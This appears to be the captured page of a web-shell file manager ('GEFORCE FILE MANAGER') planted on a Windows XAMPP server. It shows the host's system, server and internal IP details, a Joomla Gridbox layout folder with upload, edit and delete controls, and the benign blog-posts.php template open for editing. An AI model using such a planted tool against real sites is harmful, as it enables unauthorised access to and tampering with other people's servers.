[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_gridbox
/
views
/
layout
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 apps
SET
[ DEL ]
📁 css
SET
[ DEL ]
📁 import
SET
[ DEL ]
📁 patterns
SET
[ DEL ]
📁 system
SET
[ DEL ]
📄 add-to-cart.php
4,723 B
SET
[ EDIT ]
|
[ DEL ]
📄 blog-posts.php
668 B
SET
[ EDIT ]
|
[ DEL ]
📄 facebook-comments.php
2,442 B
SET
[ EDIT ]
|
[ DEL ]
📄 field-button.php
2,213 B
SET
[ EDIT ]
|
[ DEL ]
📄 field-slideshow.php
3,186 B
SET
[ EDIT ]
|
[ DEL ]
📄 flipbox.php
4,638 B
SET
[ EDIT ]
|
[ DEL ]
📄 overlay-section.php
5,315 B
SET
[ EDIT ]
|
[ DEL ]
📄 post-tags.php
2,131 B
SET
[ EDIT ]
|
[ DEL ]
📄 search-result-pagination.php
2,350 B
SET
[ EDIT ]
|
[ DEL ]
📄 social-icons.php
2,411 B
SET
[ EDIT ]
|
[ DEL ]
📄 star-ratings.php
3,296 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags.php
2,148 B
SET
[ EDIT ]
|
[ DEL ]
📄 text.php
2,353 B
SET
[ EDIT ]
|
[ DEL ]
📄 vk-comments.php
2,400 B
SET
[ EDIT ]
|
[ DEL ]
📄 weather-today.php
1,127 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: blog-posts.php
<?php /** * @package Gridbox * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; ob_start(); ?> <div class="ba-blog-post[classname]" data-id="0"> [ba-blog-post-image] <div class="ba-blog-post-content"> [ba-blog-post-title] <div class="ba-blog-post-info-wrapper"> [ba-blog-post-date] [ba-blog-post-category] [ba-blog-post-views] </div> [ba-blog-post-intro] [ba-blog-post-btn] </div> </div> <?php $out = ob_get_contents(); ob_end_clean();